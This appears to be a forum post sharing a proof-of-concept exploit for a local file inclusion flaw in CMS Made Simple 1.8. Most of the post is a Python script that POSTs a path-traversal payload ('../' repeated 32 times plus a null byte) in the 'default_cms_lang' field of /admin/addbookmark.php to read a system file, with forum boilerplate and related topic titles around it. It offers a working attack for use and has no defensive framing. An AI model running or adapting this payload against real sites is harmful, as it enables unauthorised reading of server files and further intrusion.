CMS Made Simple 1.8 Local File Inclusion
Page 1 of 1
CMS Made Simple 1.8 Local File Inclusion
A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.
- Code:
import httplib, urllib
host = 'localhost'
path = '/cmsms'
lfi = '../' * 32 + 'windows/win.ini\x00'
c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()
print r.status, r.reason
print r.read()
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics
» BaconMap 1.0 Local File Inclusion
» Apple's Safari 4 fixes local file theft attack
» Website Marketing Made Easy
» Restricting File Sharing in XP
» PHP Arbitrary File Include
» Apple's Safari 4 fixes local file theft attack
» Website Marketing Made Easy
» Restricting File Sharing in XP
» PHP Arbitrary File Include
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum